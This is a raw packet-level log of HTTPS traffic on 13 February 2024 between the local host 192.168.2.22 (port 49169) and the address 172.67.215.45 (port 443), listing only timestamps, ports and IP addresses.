Feb 13, 2024 15:08:06.594877958 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.594902992 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.594933987 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.594942093 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.594955921 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.595727921 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.595747948 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.595777035 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.595782995 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.595813036 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.595839977 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.596369028 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.596394062 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.596426010 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.596432924 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.596460104 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.596801996 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.596822977 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.596853018 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.596859932 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.596873045 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.597532988 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.597558022 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.597584009 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.597590923 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.597603083 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.597734928 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.597755909 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.597786903 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.597795963 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.597809076 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.597819090 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.598664999 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.598694086 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.598709106 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.598720074 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.598752022 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.599097967 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.599123955 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.599155903 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.599164009 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.599183083 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.599942923 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.599972010 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.599988937 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.599997044 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.600019932 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.600166082 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.600189924 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.600203037 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.600209951 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.600224972 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.600240946 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.600903034 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.600928068 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.600955963 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.600965023 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.600977898 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.601775885 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.601797104 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.601830959 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.601836920 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.601851940 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.601855040 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.601881027 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.601895094 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.601901054 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.601927042 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.601938009 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.602715969 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.602737904 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.602766991 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.602775097 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.602792025 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.603152037 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.603177071 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.603193998 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.603200912 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.603219986 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.604242086 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.604263067 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.604290962 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.604296923 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.604315042 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.604322910 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.604347944 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.604363918 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.604370117 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.604393959 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.604402065 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.605190992 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.605211973 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.605241060 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.605247021 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.605257988 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.606034040 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.606061935 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.606086969 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.606093884 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.606113911 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.606134892 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.606156111 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.606184006 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.606195927 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.606209040 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.606209040 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.606285095 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.607031107 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.607058048 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.607085943 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.607093096 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.607108116 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.607115984 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.607137918 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.607207060 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.607217073 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.607230902 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.608239889 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.608270884 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.608299017 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.608306885 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.608319998 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.608505964 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.608526945 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.608552933 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.608576059 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.608587980 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.609299898 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.609324932 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.609358072 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.609364986 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.609378099 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.609522104 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.609541893 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.609564066 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.609571934 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.609590054 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.610492945 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.610521078 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.610534906 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.610547066 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.610567093 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.611252069 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.611273050 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.611309052 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.611315012 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.611327887 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.611444950 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.611469030 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.611500978 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.611509085 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.611521959 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.612240076 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.612261057 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.612296104 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.612303019 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.612314939 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.612431049 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.612456083 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.612484932 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.612493038 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.612504959 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.613404989 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.613426924 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.613464117 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.613472939 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.613485098 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.613781929 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.613810062 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.613831997 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.613838911 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.613862038 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.614511967 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.614535093 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.614571095 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.614577055 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.614588976 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.614806890 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.614834070 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.614854097 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.614862919 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.614938974 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.615709066 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.615731001 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.615751028 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.615756989 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.615771055 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.616244078 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.616271019 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.616297007 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.616302967 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.616319895 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.616619110 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.616645098 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.616676092 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.616683960 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.616693974 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.617259979 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.617286921 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.617311001 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.617317915 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.617336988 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.617723942 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.617746115 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.617769957 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.617775917 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.617799997 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.618618011 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.618645906 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.618663073 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.618669987 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.618693113 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.618807077 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.618828058 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.618841887 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.618849993 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.618860006 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.618874073 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.619582891 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.619642019 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.619651079 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.619663000 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.619703054 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.619817019 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.619839907 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.619858027 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.619865894 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.619882107 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.620760918 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.620791912 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.620814085 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.620820999 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.620836020 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.620845079 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.620866060 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.620884895 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.620893002 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.620904922 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.620928049 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.621494055 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.621520042 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.621543884 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.621551037 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.621565104 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.622327089 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.622349024 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.622374058 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.622384071 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.622395992 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.622770071 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.622796059 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.622809887 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.622817039 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.622834921 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.622905016 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.623486042 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.623507023 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.623537064 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.623544931 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.623558044 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.623589993 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.623881102 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.623905897 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.623925924 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.623931885 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.623956919 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.624505043 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.624526024 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.624552011 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.624560118 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.624572039 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.624766111 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.624911070 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.624938965 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.624958992 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.624965906 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.624978065 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.624989033 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.625014067 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.625026941 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.625035048 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.625053883 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.625063896 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.625147104 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.625921965 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.625947952 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.625976086 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.625983000 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.625996113 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.626682043 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.626713037 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.626730919 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.626737118 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.626763105 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.626966000 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.626986027 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.627023935 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.627034903 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.627048016 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.627744913 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.627769947 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.627796888 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.627803087 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.627820969 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.628149986 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.628170967 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.628205061 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.628212929 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.628225088 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.628916025 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.628973007 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.628978014 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.628993034 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.629023075 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.629165888 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.629215002 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.629221916 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.629235983 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.629260063 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.629276037 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.629909039 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.629935980 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.629975080 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.629983902 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.630007982 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.630079985 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.630105972 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.630119085 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.630125999 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.630152941 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.630168915 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.630908966 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.630933046 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.630959034 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.630964994 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.630976915 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.631057024 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.631084919 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.631103992 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.631112099 CET	443	49169	172.67.215.45	192.168.2.22
